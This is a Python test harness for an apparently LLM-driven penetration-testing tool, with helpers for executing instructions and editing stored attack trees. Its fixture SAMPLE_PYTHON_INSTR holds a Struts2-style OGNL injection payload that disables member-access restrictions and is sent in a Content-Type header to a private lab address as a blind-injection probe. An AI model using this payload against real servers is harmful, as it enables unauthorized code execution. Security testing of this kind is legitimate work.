"""Manual test harness for the instruction executors and attack-tree tooling.

Run this file as a script. ``main`` picks one ad-hoc scenario via
``test_type``; importing the module only defines names and runs nothing.
"""
# Import order is left unchanged on purpose: the project modules may have
# import-time side effects (TODO confirm), so they are not regrouped here.
import re
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
import textwrap

# NOTE(review): not referenced anywhere in this file -- presumably intended
# for a safety check on generated code; confirm before removing.
HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']

# (node index in DFS order, index inside that node's user-instruction list)
# pairs moved by ``Mytest.update_node_inter`` when no explicit list is given.
_DEFAULT_INSTR_MOVES = ((6, 0), (39, 1), (49, 0))

# Sample "python-code" instruction handed to the Python executor in scenario 1.
# The text is runtime data and is kept verbatim (including its own comments).
# NOTE(review): the embedded template contains literal braces (e.g. the
# leading "%{") and is then passed through ``str.format``; that looks like it
# raises inside ``dynamic_fun`` and is reported as "Request failed" -- confirm
# whether this is intended for the fixture.
SAMPLE_PYTHON_INSTR = '''python-code
import requests
def dynamic_fun():
    # 基于布尔条件的盲注检测
    true_condition = "'test'=='test'"
    false_condition = "'test'=='wrong'"
    payload_template = (
        "%{(#_='multipart/form-data')."
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
        ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
        ".(#ognlUtil.getExcludedPackageNames().clear())"
        ".(#ognlUtil.getExcludedClasses().clear())"
        ".(#context.setMemberAccess(#dm))))."
        f"(#result=@java.lang.Boolean@parseBoolean({{}}))}}"
    )
    try:
        # 发送真条件请求
        true_payload = payload_template.format(true_condition)
        r_true = requests.get(
            'http://192.168.204.137',
            headers={'Content-Type': true_payload},
            timeout=10
        )
        # 发送假条件请求
        false_payload = payload_template.format(false_condition)
        r_false = requests.get(
            'http://192.168.204.137',
            headers={'Content-Type': false_payload},
            timeout=10
        )
        # 对比响应差异
        if r_true.status_code != r_false.status_code:
            return (True, f'Different status codes detected (True: {r_true.status_code} vs False: {r_false.status_code})')
        if len(r_true.content) != len(r_false.content):
            return (True, f'Content length difference detected (True: {len(r_true.content)} vs False: {len(r_false.content)})')
        return (False, 'No observable differences between true/false conditions')
    except Exception as e:
        return (False, f'Request failed: {str(e)}')
'''


class Mytest:
    """One-off maintenance helpers for a persisted attack tree."""

    def update_node_inter(self, attack_index, moves=_DEFAULT_INSTR_MOVES):
        """Move user instructions from selected nodes up to their parents.

        Loads the tree stored under ``attack_index``, and for every
        ``(node_index, instr_index)`` pair in ``moves`` pops that entry from
        the node's user-instruction list and appends it to the parent's list.
        The modified tree is written back under the same key.

        Args:
            attack_index: Key passed to ``g_PKM.ReadData`` / ``WriteData``.
            moves: Iterable of ``(node_index, instr_index)`` pairs, where
                ``node_index`` indexes the result of ``traverse_dfs()``.
                Defaults to the three moves that were hard-coded here.
        """
        attack_tree = g_PKM.ReadData(attack_index)
        nodes = attack_tree.traverse_dfs()
        for node_index, instr_index in moves:
            node = nodes[node_index]
            moved = node.get_instr_user().pop(instr_index)
            node.parent.get_instr_user().append(moved)
        g_PKM.WriteData(attack_tree, attack_index)


def _run_instruction(raw_instr, task_object, python_manager):
    """Execute one instruction string and print the executor's result.

    Text containing ``python-code`` goes to ``python_manager``; anything else
    is treated as a shell instruction and goes to ``g_instrM``.
    """
    # Dedent first, then strip: stripping first removes the first line's
    # indentation, which leaves dedent with no common margin to remove.
    code = textwrap.dedent(raw_instr).strip()
    if "python-code" in code:
        outcome = python_manager.execute_instruction(code)
    else:
        # Chained shell commands are pre-processed on the first separator
        # found ("&&" is checked before "||"). The existing note on this
        # step warns that this handling is itself risky.
        for separator in ("&&", "||"):
            if separator in code:
                code = task_object.mill_instr_preprocess(code, separator)
                break
        outcome = g_instrM.execute_instruction(code)
    # Both executors are expected to return a 4-tuple; only the second item
    # is displayed.
    _instr, result, _source_result, _ext_params = outcome
    print("----执行结果----")
    print(result)


def _add_instructions_to_node(task_id, node_index=78, commands=()):
    """Append ``commands`` to one node of a task's attack tree and save it."""
    g_TaskM.load_tasks()
    task = g_TaskM.tasks[task_id]
    cur_node = task.attack_tree.traverse_dfs()[node_index]
    for cmd in commands:
        cur_node.add_instr(cmd)
    cur_node.update_work_status(1)
    # Persist the modified tree under the task's id.
    g_PKM.WriteData(task.attack_tree, str(task.task_id))


def _refresh_system_messages(llm, tree_key="6"):
    """Overwrite the first message of every node with a freshly built prompt."""
    # Imported here so the other scenarios do not need this module.
    from mycode.AttackMap import TreeNode

    attack_tree = g_PKM.ReadData(tree_key)
    # A throwaway node is used only to obtain the current initial prompt.
    probe_node = TreeNode("test", 0)
    llm.build_initial_prompt(probe_node)
    system_content = probe_node.messages[0]["content"]
    for node in attack_tree.traverse_bfs():
        node.messages[0]["content"] = system_content
    g_PKM.WriteData(attack_tree, tree_key)
    print("完成Messgae更新")


def main(test_type=1, task_id=16):
    """Run one manual scenario.

    Args:
        test_type: 1 executes ``SAMPLE_PYTHON_INSTR``; 2 adds instructions to
            a node of task ``task_id``; 4 refreshes the first message of
            every node in a stored tree. 3 is an unimplemented placeholder
            (reading instructions by format); any other value does nothing.
        task_id: Task looked up in ``g_TaskM.tasks`` for scenario 2.
    """
    # The managers are created up front regardless of the chosen scenario.
    llm = LLMManager(1)
    python_manager = PythonTManager(myCongif.get_data("Python_max_procs"))
    current_path = os.path.dirname(os.path.realpath(__file__))
    print(current_path)
    task_object = TaskObject("test_target", "cookie_info", 1, 1, 1, "local_ip", None)

    if test_type == 1:
        _run_instruction(SAMPLE_PYTHON_INSTR, task_object, python_manager)
    elif test_type == 2:
        _add_instructions_to_node(task_id)
    elif test_type == 4:
        _refresh_system_messages(llm)


if __name__ == "__main__":
    main()